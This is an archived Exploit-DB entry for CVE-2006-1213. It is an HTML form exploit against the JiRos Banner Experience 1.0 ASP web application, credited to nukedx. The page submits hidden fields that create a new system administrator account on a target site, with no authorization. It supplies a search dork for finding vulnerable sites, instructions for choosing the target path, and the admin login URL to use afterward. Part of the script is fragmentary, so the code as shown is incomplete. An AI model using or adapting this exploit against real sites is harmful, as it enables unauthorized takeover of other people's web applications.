JiRos Banner Experience 1.0 Create Admin Bypass Remote Exploit

ID EDB-ID:1571
Type exploitdb
Reporter nukedx
Modified 2006-03-09T00:00:00


JiRos Banner Experience 1.0 (Create Admin Bypass) Remote Exploit. CVE-2006-1213. Webapps exploit for asp platform

<title>Jiros Banner Experience Pro Unauthorized Admin Add Exploit</title>
<body bgcolor="#000000">
.xpl {font-family:tahoma; font-size:11px; text-decoration: none;}
<script language="JavaScript">
function jbxpl() {
  if (document.xplt.victim.value=="") {
    alert("Please enter site!");
    return false;
  if (confirm("Are you sure?")) {
<font class="xpl" color="#00FF40">
Welcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit
This exploit has been coded by nukedx
You can found original advisory on http://www.nukedx.com/?viewdoc=19
Dork for this exploit: <u>inurl:JBSPro</u>
Your target must be like that: www.victim.com/Path/
The sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp
If the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/
For second example your target must be www.victim.com/
You can login with your admin account via www.victim.com/JBSPath/files/login.asp
Have phun
<form name="xplt" method="POST" onsubmit="jbxpl();">
Target -> <input type="text" name="victim" value="www.victim.com/Path/" size="44" class="xpl">
<input type="text" name="aName" value="Enter Username" class="xpl" size="30">
<input type="text" name="aEmail" value="Enter Email" class="xpl" size="30">
<input type="text" name="aPassword" value="Enter Password" class="xpl" size="30">
<input type="hidden" name="aIsSystemAdmin" value="True">
<input type="hidden" name="aIsActive" value="True">
<input type="submit" value="Send" class="xpl">

Save this code as .htm and then execute.

# nukedx.com [2006-03-07]

# milw0rm.com [2006-03-09]